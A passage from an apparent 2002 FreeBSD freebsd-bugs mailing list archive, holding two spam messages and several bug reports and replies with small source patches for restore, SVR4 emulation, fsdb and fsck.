=CA=D3=C3=CD=A7=B7=D5=E8=B9=D1=E8=A7=E0=BE=D7=E8=CD=BF=D1=A7=A1=D2= =C3=BA=C3=C3=C2=D2=C2   = =BF=C3=D5 !!!
*************************************************************
          &nbs= p; =20 =A2=CD=CD=C0=D1=C2=CB=D2=A1=A2=E9=CD=A4=C7=D2=C1=B9=D5=E9=E4=BB= =B6=D6=A7=A4=D8=B3=E2=B4=C2=BA=D1=A7=E0=CD=D4=AD=CB=D2=A1=A4=D8=B3=E4=C1=E8= =B5=E9=CD=A7=A1=D2=C3=C3=D1=BA=A2=E9=CD=A4=C7=D2=C1=B9=D5=E9=CD=D5=A1
=   =20 =            =        =20 =A1=C3=D8=B3=D2 =E1=A8=E9=A7 Mail=20 = =A2=CD=A7=A4=D8=B3=B7=D5=E8=B5=E9=CD=A7=A1=D2=C3=C5=BA=C1=D2=B7=D5=E8 = "Unsubscribe"

------=_NextPart_000_01FE_01C21C67.BCB0AE60-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Jun 25 7:58:29 2002 Delivered-To: freebsd-bugs@freebsd.org Received: from relay.sergeax.ru (svc990161.ll.zenon.net [195.2.82.144]) by hub.freebsd.org (Postfix) with ESMTP id 8FF9C37B411 for ; Tue, 25 Jun 2002 07:58:05 -0700 (PDT) Received: from [195.2.82.144] (HELO sergeax-ru) by relay.sergeax.ru (CommuniGate Pro SMTP 3.5.4) with SMTP id 1214005 for freebsd-bugs@freebsd.org; Tue, 25 Jun 2002 18:57:57 +0400 Subject: Давайте знакомиться :) From: info@scootershop.ru To: freebsd-bugs@freebsd.org X-Mailer: ActiveX Server Component SMTP Version 1.0.6 X-Sender: sergeax-ru MIME-Version: 1.0 Content-Type: text/plain; charset="koi8-r" Content-Transfer-Encoding: 8bit Date: Tue, 25 Jun 2002 18:57:57 +0400 Message-ID: Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org *This message was transferred with a trial version of CommuniGate(tm) Pro* СКУТЕР √ это компактный японский мотоцикл, отличающийся плавностью хода, традиционной для Японии надежностью и не требующий водительских прав. ОСНОВНЫЕ КАЧЕСТВА √ комфорт, безопасность, доступность (от 300 $). В России скутер √ это прекрасный и недорогой подарок для Вас, Ваших детей и всей Вашей семьи. Удобен, как на даче, так и в городе. На нем можно ездить на речку, в институт, в школу, в спортклуб и т.д. СКУТЕР √ это новое увлечение и новые друзья. МЫ (СкутерШоп) занимаемся продажей и ремонтом б/у японских скутеров уже более 5-и лет. Наши скутера отличает высокий уровень беспроблемности. То есть, Вы просто катаетесь и не думаете о ремонте. Это достигается специальной технической подготовкой наших машин. МЫ продаем скутера таких известных марок, как Honda, Yamaha, Suzuki. МЫ находимся в Москве, но работаем по всей территории России. Более подробную информацию Вы можете получить на нашем сайте: http://www.scootershop.ru/ или по телефонам в Москве: 905-54-07, 798-17-19, 755-8053, 778-1928, 489-4096. С уважением, Алексей Дерунов, менеджер по рекламе. e-mail: alexeyvt@scootershop.ru icq: 160878658 P.S. Мы приносим свои извинения, если это сообщение вызвало у Вас негативную реакцию. Если же вы желаете и впредь получать информацию о новых моделях, скидках и спецпредложениях, подпишитесь на новости на нашем сайте: www.scootershop.ru. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Jun 25 8:15:51 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 52E0937B413 for ; Tue, 25 Jun 2002 08:10:10 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5PFAAa32123; Tue, 25 Jun 2002 08:10:10 -0700 (PDT) (envelope-from gnats) Received: from pr93.lublin.sdi.tpnet.pl (pr93.lublin.sdi.tpnet.pl [217.97.36.93]) by hub.freebsd.org (Postfix) with SMTP id 0625237B408 for ; Tue, 25 Jun 2002 08:06:26 -0700 (PDT) Received: (qmail 791 invoked by uid 1001); 25 Jun 2002 15:04:28 -0000 Message-Id: <20020625150428.790.qmail@pr93.lublin.sdi.tpnet.pl> Date: 25 Jun 2002 15:04:28 -0000 From: Michal Pasternak Reply-To: Michal Pasternak To: FreeBSD-gnats-submit@FreeBSD.org X-Send-Pr-Version: 3.113 Subject: i386/39844: PANIC using mount -> atacontrol detach -> ls/cat that device Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 39844 >Category: i386 >Synopsis: PANIC using mount -> atacontrol detach -> ls/cat that device >Confidential: no >Severity: critical >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Tue Jun 25 08:10:09 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Michal Pasternak >Release: FreeBSD 4.6-STABLE i386 >Organization: >Environment: System: FreeBSD pasternak.w.lub.pl 4.6-STABLE FreeBSD 4.6-STABLE #1: Tue Jun 18 04:33:07 CEST 2002 doc@pasternak.w.lub.pl:/usr/obj/usr/src/sys/ILIT i386 >Description: Using devices, that are mounted, but their controllers are detached (using atacontrol) causes PANIC. My config: atapci0: port 0xd000-0xd00f at device 7.1 on pci0 ata0: at 0x1f0 irq 14 on atapci0 ata1: at 0x170 irq 15 on atapci0 ad0: 8223MB [16708/16/63] at ata0-master UDMA66 acd0: CDROM at ata1-slave PIO4 >How-To-Repeat: 1. mount something on 2nd IDE controller (ata1) 2. detach IDE controller (atacontrol detach 1) 3. ls or cat mounted device - system panics >Fix: I have some ideas, like: 1. atacontrol SHOULD NOT allow to detach controllers, which have mounted devices 2. atacountrol should DISPLAY A BIG FAT WARNING and ASK FOR A CONFIRMATION when trying to detach controller with mounted device 3. atacountrol should automagically umount devices 4. manpage should DISPLAY A BIG FAT WARNING 5. additional checks in device drivers (is the device we're trying to read available, together with it's controller) could IMVHO slow things down, but I'm not a kernel hacker, so how should I know >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Jun 25 10:31: 1 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 9BFF337B405 for ; Tue, 25 Jun 2002 10:30:01 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5PHU1Q57278; Tue, 25 Jun 2002 10:30:01 -0700 (PDT) (envelope-from gnats) Received: from tapil.com (dsl092-068-186.bos1.dsl.speakeasy.net [66.92.68.186]) by hub.freebsd.org (Postfix) with ESMTP id 4376937B43E for ; Tue, 25 Jun 2002 10:24:37 -0700 (PDT) Received: from grumpy.tapil.com (localhost.tapil.com [127.0.0.1]) by tapil.com (8.12.3/8.12.3) with ESMTP id g5PHOaGI010587 for ; Tue, 25 Jun 2002 13:24:36 -0400 (EDT) (envelope-from madler@grumpy.tapil.com) Received: (from madler@localhost) by grumpy.tapil.com (8.12.3/8.12.3/Submit) id g5PHOVTg010586; Tue, 25 Jun 2002 13:24:31 -0400 (EDT) Message-Id: <200206251724.g5PHOVTg010586@grumpy.tapil.com> Date: Tue, 25 Jun 2002 13:24:31 -0400 (EDT) From: "Michael C. Adler" Reply-To: "Michael C. Adler" To: FreeBSD-gnats-submit@FreeBSD.org X-Send-Pr-Version: 3.113 Subject: bin/39849: /sbin/restore fails to overwrite files with schg flag set Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 39849 >Category: bin >Synopsis: /sbin/restore fails to overwrite files with schg flag set >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Tue Jun 25 10:30:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Michael C. Adler >Release: FreeBSD 4.6-RELEASE i386 >Organization: >Environment: System: FreeBSD grumpy.tapil.com 4.6-RELEASE FreeBSD 4.6-RELEASE #0: Tue Jun 18 11:30:24 EDT 2002 madler@grumpy.tapil.com:/usr/obj/usr/src/sys/GRUMPY i386 >Description: Incremental restore fails to overwrite an older file that has a flag set making the file immutable. (E.g. schg.) This became painfully obvious when I did a level 0 dump/restore. Updated from 4.5 to 4.6 and then attempted a level 1 dump/restore to the same source/target disk pair. >How-To-Repeat: Create a test tree with a file having the schg flag set. dump/restore to a new partition with restore having -r -u set. Clear the schg flag in the original file, modify the file and set the schg flag again. dump (level 1) and do another restore -r -u to the target. Note that the file does not get updated. >Fix: The following patch fixes the simplest cases. It forces unlink() and rmdir() to clear the flags first. It forces rename() to clear all flags and restore them after the file is renamed. There is a remaining, more difficult, case that is not fixed. Imagine directory X is tagged schg. If its contents are modified for the level 1 dump, restore would have to clear the schg flag on the directory before restoring the files in X. I have not fixed this. It requires walking up the path until you find a directory without an immutable flag, walking back down to clear them and then resetting them all after the operation is complete. *** extern.h.~1~ Fri Aug 27 20:14:05 1999 --- extern.h Tue Jun 25 12:33:32 2002 *************** *** 54,59 **** --- 54,62 ---- int extractfile __P((char *)); void findunreflinks __P((void)); char *flagvalues __P((struct entry *)); + int forcerename __P((char *, char *)); + int forcermdir __P((char *)); + int forceunlink __P((char *)); void freeentry __P((struct entry *)); void freename __P((char *)); int genliteraldir __P((char *, ino_t)); *** tape.c.~1~ Tue Jun 18 09:09:34 2002 --- tape.c Tue Jun 25 11:52:28 2002 *************** *** 600,606 **** return (GOOD); } if (uflag && !Nflag) ! (void)unlink(name); if (mkfifo(name, mode) < 0) { fprintf(stderr, "%s: cannot create fifo: %s\n", name, strerror(errno)); --- 600,606 ---- return (GOOD); } if (uflag && !Nflag) ! (void)forceunlink(name); if (mkfifo(name, mode) < 0) { fprintf(stderr, "%s: cannot create fifo: %s\n", name, strerror(errno)); *************** *** 622,628 **** return (GOOD); } if (uflag) ! (void)unlink(name); if (mknod(name, mode, (int)curfile.dip->di_rdev) < 0) { fprintf(stderr, "%s: cannot create special file: %s\n", name, strerror(errno)); --- 622,628 ---- return (GOOD); } if (uflag) ! (void)forceunlink(name); if (mknod(name, mode, (int)curfile.dip->di_rdev) < 0) { fprintf(stderr, "%s: cannot create special file: %s\n", name, strerror(errno)); *************** *** 643,649 **** return (GOOD); } if (uflag) ! (void)unlink(name); if ((ofile = open(name, O_WRONLY | O_CREAT | O_TRUNC, 0666)) < 0) { fprintf(stderr, "%s: cannot create file: %s\n", --- 643,649 ---- return (GOOD); } if (uflag) ! (void)forceunlink(name); if ((ofile = open(name, O_WRONLY | O_CREAT | O_TRUNC, 0666)) < 0) { fprintf(stderr, "%s: cannot create file: %s\n", *** utilities.c.~1~ Fri Sep 21 16:05:22 2001 --- utilities.c Tue Jun 25 12:34:14 2002 *************** *** 129,135 **** renameit(from, to) char *from, *to; { ! if (!Nflag && rename(from, to) < 0) { fprintf(stderr, "warning: cannot rename %s to %s: %s\n", from, to, strerror(errno)); return; --- 129,135 ---- renameit(from, to) char *from, *to; { ! if (!Nflag && forcerename(from, to) < 0) { fprintf(stderr, "warning: cannot rename %s to %s: %s\n", from, to, strerror(errno)); return; *************** *** 173,179 **** ep->e_flags |= REMOVED; ep->e_flags &= ~TMPNAME; cp = myname(ep); ! if (!Nflag && rmdir(cp) < 0) { fprintf(stderr, "warning: %s: %s\n", cp, strerror(errno)); return; } --- 173,179 ---- ep->e_flags |= REMOVED; ep->e_flags &= ~TMPNAME; cp = myname(ep); ! if (!Nflag && forcermdir(cp) < 0) { fprintf(stderr, "warning: %s: %s\n", cp, strerror(errno)); return; } *************** *** 194,200 **** ep->e_flags |= REMOVED; ep->e_flags &= ~TMPNAME; cp = myname(ep); ! if (!Nflag && unlink(cp) < 0) { fprintf(stderr, "warning: %s: %s\n", cp, strerror(errno)); return; } --- 194,200 ---- ep->e_flags |= REMOVED; ep->e_flags &= ~TMPNAME; cp = myname(ep); ! if (!Nflag && forceunlink(cp) < 0) { fprintf(stderr, "warning: %s: %s\n", cp, strerror(errno)); return; } *************** *** 250,255 **** --- 250,339 ---- vprintf(stdout, "Create %s link %s->%s\n", type == SYMLINK ? "symbolic" : "hard", new, existing); return (GOOD); + } + + /* + * Make rename() work even if system flags prohibit it. Don't print warning + * messages here since caller may be calling without testing if the + * file exists. + */ + + int + forcerename(from, to) + char *from, *to; + { + struct stat sb; + + if (!Nflag) { + if (stat(from, &sb) < 0) { + return -1; + } + if (sb.st_flags) { + chflags(from, 0); + } + if (rename(from, to) < 0) { + return -1; + } + if (sb.st_flags) { + return chflags(to, sb.st_flags); + } + } + + return 0; + } + + /* + * Make rmdir() work even if system flags prohibit it. Don't print warning + * messages here since caller may be calling without testing if the + * directory exists. + */ + + int + forcermdir(name) + char *name; + { + struct stat sb; + + if (!Nflag) { + if (stat(name, &sb) < 0) { + return -1; + } + if (sb.st_flags) { + chflags(name, 0); + } + if (rmdir(name) < 0) { + return -1; + } + } + + return 0; + } + + /* + * Make unlink() work even if system flags prohibit it. Don't print warning + * messages here since caller may be calling without testing if the + * file exists. + */ + + int + forceunlink(name) + char *name; + { + struct stat sb; + + if (!Nflag) { + if (stat(name, &sb) < 0) { + return -1; + } + if (sb.st_flags) { + chflags(name, 0); + } + if (unlink(name) < 0) { + return -1; + } + } + + return 0; } /* >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Jun 25 11:50:34 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id D7F3A37B404 for ; Tue, 25 Jun 2002 11:50:03 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5PIo3l73202; Tue, 25 Jun 2002 11:50:03 -0700 (PDT) (envelope-from gnats) Date: Tue, 25 Jun 2002 11:50:03 -0700 (PDT) Message-Id: <200206251850.g5PIo3l73202@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Nate Lawson Subject: Re: kern/38726: Linksys EtherFast 10/100 PCMCIA card recognized asdevice ed1 Reply-To: Nate Lawson Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR kern/38726; it has been noted by GNATS. From: Nate Lawson To: erc@pobox.com Cc: freebsd-gnats-submit@FreeBSD.org Subject: Re: kern/38726: Linksys EtherFast 10/100 PCMCIA card recognized asdevice ed1 Date: Tue, 25 Jun 2002 12:17:46 -0700 (PDT) You didn't post your kernel config but I assume you're using something similar to GENERIC. The ed0 entry in GENERIC allocates ed0 for probing ISA legacy ed cards, leaving ed1 as the next available device for the detected PCMCIA card. I worked around this by changing: device ed0 at isa? port 0x280 irq 10 iomem 0xd8000 to: device ed -Nate To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Jun 25 12: 2:16 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id C344237B6DA for ; Tue, 25 Jun 2002 12:00:10 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5PJ0AW74622; Tue, 25 Jun 2002 12:00:10 -0700 (PDT) (envelope-from gnats) Date: Tue, 25 Jun 2002 12:00:10 -0700 (PDT) Message-Id: <200206251900.g5PJ0AW74622@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Nate Lawson Subject: Re: kern/38562: bridge_cfg=*dc0* ; kldload if_dc => panic SMP XXX Reply-To: Nate Lawson Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR kern/38562; it has been noted by GNATS. From: Nate Lawson To: freebsd-gnats-submit@FreeBSD.org, ben@ben.com Cc: Subject: Re: kern/38562: bridge_cfg=*dc0* ; kldload if_dc => panic SMP XXX Date: Tue, 25 Jun 2002 12:29:45 -0700 (PDT) Could you please reply with a panic message and stack trace (options DDB, trace)? -Nate To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Jun 25 12:30:14 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id E3D4A37B400 for ; Tue, 25 Jun 2002 12:30:03 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5PJU3R82667; Tue, 25 Jun 2002 12:30:03 -0700 (PDT) (envelope-from gnats) Date: Tue, 25 Jun 2002 12:30:03 -0700 (PDT) Message-Id: <200206251930.g5PJU3R82667@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Nate Lawson Subject: Re: kern/38527: /dev/random does not obey O_NONBLOCK flag Reply-To: Nate Lawson Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR kern/38527; it has been noted by GNATS. From: Nate Lawson To: freebsd-gnats-submit@FreeBSD.org, gson@nominum.com Cc: Subject: Re: kern/38527: /dev/random does not obey O_NONBLOCK flag Date: Tue, 25 Jun 2002 13:00:04 -0700 (PDT) This behavior is intentional and was changed some time ago. If you want to block on /dev/random waiting for bytes to be available, use select/poll. Followup discussion to -current. -Nate To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Jun 25 16:40:46 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id EB3A237B436 for ; Tue, 25 Jun 2002 16:40:02 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5PNe2R24381; Tue, 25 Jun 2002 16:40:02 -0700 (PDT) (envelope-from gnats) Received: from nwww.freebsd.org (www.FreeBSD.org [216.136.204.117]) by hub.freebsd.org (Postfix) with ESMTP id 2285737B400 for ; Tue, 25 Jun 2002 16:34:44 -0700 (PDT) Received: from www.freebsd.org (localhost [127.0.0.1]) by nwww.freebsd.org (8.12.2/8.12.2) with ESMTP id g5PNYhhG098199 for ; Tue, 25 Jun 2002 16:34:43 -0700 (PDT) (envelope-from nobody@www.freebsd.org) Received: (from nobody@localhost) by www.freebsd.org (8.12.2/8.12.2/Submit) id g5PNYhnb098198; Tue, 25 Jun 2002 16:34:43 -0700 (PDT) Message-Id: <200206252334.g5PNYhnb098198@www.freebsd.org> Date: Tue, 25 Jun 2002 16:34:43 -0700 (PDT) From: Kevin Van Maren To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: kern/39861: SVR4 emulation broken in 4.5/4.6-RELEASE Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 39861 >Category: kern >Synopsis: SVR4 emulation broken in 4.5/4.6-RELEASE >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Tue Jun 25 16:40:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Kevin Van Maren >Release: 4.5/4.6 >Organization: >Environment: >Description: It was already described adequately at: http://spitfire.velocet.net/pipermail/freebsd-stable/2001-April/013051.html [stable] SVR4 fix Willem van Engen wvengen@stack.nl Tue, 17 Apr 2001 14:24:47 +0200 The svr4 emulation modules (streams.ko and svr4.ko) load corretly, but when an SVR4-branded binary is run, ELF Binary type "0" not known Abort trap is displayed. The attached patch (to be applied in /usr/src/sys) solves this. Maybe someone can use it. - Willem van Engen --- /tmp/svr4_sysvec.c Tue Apr 17 12:14:52 2001 +++ svr4/svr4_sysvec.c Tue Apr 17 12:08:15 2001 @@ -185,6 +185,7 @@ }; Elf32_Brandinfo svr4_brand = { + ELFOSABI_SYSV, "SVR4", "/compat/svr4", "/lib/libc.so.1", >How-To-Repeat: Try to USE the SVR4 emulation on FreeBSD. >Fix: Patch included above. Workes for me on 4.5-RELEASE. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Jun 25 18:20:30 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 9BA3937B40A for ; Tue, 25 Jun 2002 18:20:02 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5Q1K2Y42757; Tue, 25 Jun 2002 18:20:02 -0700 (PDT) (envelope-from gnats) Received: from nwww.freebsd.org (www.FreeBSD.org [216.136.204.117]) by hub.freebsd.org (Postfix) with ESMTP id 572CD37B404 for ; Tue, 25 Jun 2002 18:15:05 -0700 (PDT) Received: from www.freebsd.org (localhost [127.0.0.1]) by nwww.freebsd.org (8.12.2/8.12.2) with ESMTP id g5Q1F5hG010011 for ; Tue, 25 Jun 2002 18:15:05 -0700 (PDT) (envelope-from nobody@www.freebsd.org) Received: (from nobody@localhost) by www.freebsd.org (8.12.2/8.12.2/Submit) id g5Q1F5N8010010; Tue, 25 Jun 2002 18:15:05 -0700 (PDT) Message-Id: <200206260115.g5Q1F5N8010010@www.freebsd.org> Date: Tue, 25 Jun 2002 18:15:05 -0700 (PDT) From: tom To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: misc/39864: hostname instead of IP in w -n output Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 39864 >Category: misc >Synopsis: hostname instead of IP in w -n output >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Tue Jun 25 18:20:02 PDT 2002 >Closed-Date: >Last-Modified: >Originator: tom >Release: 4.6-stable >Organization: >Environment: FreeBSD mail.phoenixgate.org 4.6-STABLE FreeBSD 4.6-STABLE #2: Sun Jun 16 23:52:00 EDT 2002 tom@mail.phoenixgate.org:/usr/src/sys/compile/TOM i386 >Description: In some cases w -n doesn't behave as expected. mail# w 9:02PM up 7 days, 19:47, 2 users, load averages: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE WHAT tom p0 its.unhooked.net 4:48PM - w phoenixdragon p2 ip-209-23-4-134. 8:14PM 46 ping 209.23.0.161 mail> w -n 9:02PM up 7 days, 19:47, 2 users, load averages: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE WHAT tom p0 64.180.9.88 4:48PM - w -n phoenixdragon p2 ip-209-23-4-134. 8:14PM 46 ping 209.23.0.161 mail> host 209.23.4.134 134.4.23.209.IN-ADDR.ARPA domain name pointer ip-209-23-4-134.modem.logical.net >How-To-Repeat: type w -n >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Jun 25 18:30:14 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id DCDE937B404 for ; Tue, 25 Jun 2002 18:30:01 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5Q1U1O43767; Tue, 25 Jun 2002 18:30:01 -0700 (PDT) (envelope-from gnats) Received: from xkulesh.vol.cz (xkulesh.vol.cz [195.250.154.106]) by hub.freebsd.org (Postfix) with ESMTP id C84C637B40A for ; Tue, 25 Jun 2002 18:20:33 -0700 (PDT) Received: from obluda.cz (localhost [127.0.0.1]) by xkulesh.vol.cz (8.12.3/8.12.3) with ESMTP id g5Q1KUTv057822 for ; Wed, 26 Jun 2002 03:20:31 +0200 (CEST) (envelope-from dan@obluda.cz) Received: (from root@localhost) by obluda.cz (8.12.4/8.12.4/Submit) id g5Q0wVFJ057053; Wed, 26 Jun 2002 02:58:31 +0200 (CEST) Message-Id: <200206260058.g5Q0wVFJ057053@obluda.cz> Date: Wed, 26 Jun 2002 02:58:31 +0200 (CEST) From: Dan Lukes Reply-To: Dan Lukes To: FreeBSD-gnats-submit@FreeBSD.org X-Send-Pr-Version: 3.113 Subject: bin/39866: cleaning sbin/fsdb code from warnings Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 39866 >Category: bin >Synopsis: cleaning sbin/fsdb code from warnings >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Tue Jun 25 18:30:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Dan Lukes >Release: FreeBSD 4.6-STABLE i386 >Organization: Obludarium >Environment: System: FreeBSD xkulesh.vol.cz 4.6-STABLE FreeBSD src/sbin/fsdb/fsdbutil.c,v 1.9.2.2 2002/03/20 13:39:02 >Description: sbin/fsdb/fsdbutil.c: In function `printblocks': 251: warning: unused variable `j' it variable is really unused >How-To-Repeat: N/A >Fix: --- sbin/fsdb/fsdbutil.c.ORIG Mon Mar 25 20:10:30 2002 +++ sbin/fsdb/fsdbutil.c Wed Jun 26 02:52:05 2002 @@ -248,7 +248,7 @@ struct dinode *dp; { char *bufp; - int i, j, nfrags; + int i, nfrags; long ndb, offset; printf("Blocks for inode %d:\n", inum); >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Jun 25 18:30:35 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id C25B137B403 for ; Tue, 25 Jun 2002 18:30:01 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5Q1U1g43756; Tue, 25 Jun 2002 18:30:01 -0700 (PDT) (envelope-from gnats) Received: from xkulesh.vol.cz (xkulesh.vol.cz [195.250.154.106]) by hub.freebsd.org (Postfix) with ESMTP id A721037B405 for ; Tue, 25 Jun 2002 18:20:33 -0700 (PDT) Received: from obluda.cz (localhost [127.0.0.1]) by xkulesh.vol.cz (8.12.3/8.12.3) with ESMTP id g5Q1KUTx057822 for ; Wed, 26 Jun 2002 03:20:31 +0200 (CEST) (envelope-from dan@obluda.cz) Received: (from root@localhost) by obluda.cz (8.12.4/8.12.4/Submit) id g5Q0nwan056322; Wed, 26 Jun 2002 02:49:58 +0200 (CEST) Message-Id: <200206260049.g5Q0nwan056322@obluda.cz> Date: Wed, 26 Jun 2002 02:49:58 +0200 (CEST) From: Dan Lukes Reply-To: Dan Lukes To: FreeBSD-gnats-submit@FreeBSD.org X-Send-Pr-Version: 3.113 Subject: bin/39865: cleaning sbin/fsck code from some warnings Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 39865 >Category: bin >Synopsis: cleaning sbin/fsck code from some warnings >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Tue Jun 25 18:30:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Dan Lukes >Release: FreeBSD 4.6-STABLE i386 >Organization: Obludarium >Environment: System: FreeBSD xkulesh.vol.cz 4.6-STABLE FreeBSD src/sbin/fsck/dir.c,v 1.15 1999/08/28 00:12:45 src/sbin/fsck/inode.c,v 1.20 2000/02/28 20:02:41 src/sbin/fsck/main.c,v 1.21.2.1 2001/01/23 23:11:07 src/sbin/fsck/pass2.c,v 1.10.2.2 2001/11/24 15:14:59 src/sbin/fsck/pass3.c,v 1.7.2.1 2001/01/23 23:11:07 src/sbin/fsck/pass5.c,v 1.17.2.1 2001/01/23 23:11:07 src/sbin/fsck/preen.c,v 1.16 1999/12/30 16:32:40 >Description: sbin/fsck/dir.c: In function `dirscan': 127: warning: comparison between signed and unsigned dsize is initialized from d_reclen which is 